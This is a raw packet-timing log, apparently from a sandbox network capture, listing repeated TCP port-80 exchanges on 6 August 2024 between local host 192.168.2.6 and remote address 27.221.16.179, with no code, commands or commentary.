                                                                                                                                    Aug 6, 2024 10:30:18.247452974 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.247477055 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.247488022 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.247526884 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.247538090 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.247548103 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.247571945 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.247571945 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.247661114 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.248119116 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.248131037 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.248142004 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.248173952 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.248184919 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.248197079 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.248209953 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.248224020 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.248260021 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.597398996 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597410917 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597421885 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597496986 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597508907 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597520113 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597531080 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597542048 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597559929 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.597634077 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.597677946 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597752094 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597769022 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597779036 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597790003 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597810030 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.597826004 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.597853899 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597866058 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597877026 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.597908020 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.597948074 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.598695040 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.598707914 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.598721027 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.598773956 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.598781109 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.598790884 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.598800898 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.598812103 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.598855019 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.598859072 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.598932028 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.914910078 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.914937019 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.914947987 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.914959908 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.914972067 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915044069 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915069103 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.915077925 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915090084 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915116072 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.915123940 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915134907 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915138006 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.915147066 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915158033 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915218115 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.915218115 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.915721893 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915733099 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915744066 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915810108 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915822029 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915822983 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.915832996 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.915868044 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.915910006 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.916198969 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916209936 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916220903 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916295052 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916306019 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916316032 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916325092 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.916328907 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916368961 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.916378021 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916382074 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.916388988 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916400909 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.916441917 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.916441917 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:18.917134047 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.917205095 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:18.917289972 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.229180098 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229207039 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229217052 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229228020 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229239941 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229249954 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229260921 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229269981 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229326010 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.229408026 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.229763031 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229836941 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229847908 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229857922 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229867935 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229877949 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.229897022 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.229912043 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.229971886 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.230104923 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230114937 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230125904 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230137110 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230146885 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230189085 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.230189085 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.230365038 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230375051 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230386019 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230420113 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.230473995 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230484962 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230494976 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230495930 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.230508089 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230534077 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.230559111 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230570078 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230578899 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230580091 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.230588913 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.230624914 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.230624914 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.231230021 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.231287003 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.231297970 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.231313944 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.231339931 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.231374025 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.315862894 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.364507914 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579125881 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579144001 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579201937 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579215050 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579245090 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579255104 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579256058 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579255104 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579268932 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579312086 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579361916 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579372883 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579382896 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579394102 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579401970 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579442978 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579452038 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579462051 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579472065 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579482079 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579493046 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579495907 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579505920 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579521894 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579534054 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579544067 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.579554081 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579554081 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579591990 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.579628944 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.580240011 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580338955 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580348969 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580359936 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580377102 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580399990 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.580399990 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.580423117 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580434084 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580446959 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580478907 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.580480099 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.580816984 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580869913 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580881119 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580923080 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580934048 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580944061 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.580965996 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.580965996 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.581005096 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.581017017 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.581027031 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.581038952 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.581048965 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.581053019 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.581053019 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.581080914 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.630089045 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.924928904 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.924954891 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.924966097 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.924977064 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.924994946 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925004959 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925015926 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925026894 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925038099 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925049067 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925081015 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.925134897 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.925172091 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925271034 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925282001 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925292015 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925302029 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925313950 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925322056 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.925324917 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925350904 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925358057 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.925364017 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925434113 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.925446987 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925458908 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925467968 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925478935 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925488949 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925501108 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.925504923 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.925523996 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.925564051 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.926033974 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926064968 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926100016 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.926142931 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926155090 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926165104 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926175117 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926186085 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926232100 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.926232100 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.926466942 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926479101 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926489115 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926505089 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926515102 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926537991 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.926537991 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.926601887 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926614046 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926624060 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926634073 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926650047 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926661015 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.926661968 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926672935 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:19.926685095 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:19.926723957 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241132975 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241161108 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241179943 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241190910 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241202116 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241214037 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241225004 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241228104 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241228104 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241235971 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241245985 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241246939 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241260052 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241288900 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241301060 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241308928 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241312027 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241322041 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241332054 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241343021 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241354942 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241373062 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241373062 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241403103 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241496086 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241523981 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241535902 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241576910 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241596937 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241609097 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241621017 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241632938 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241662979 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241662979 CEST4977780192.168.2.627.221.16.179
                                                                                                                                    Aug 6, 2024 10:30:20.241797924 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241808891 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241818905 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241830111 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241839886 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241849899 CEST804977727.221.16.179192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:20.241862059 CEST804977727.221.16.179192.168.2.6
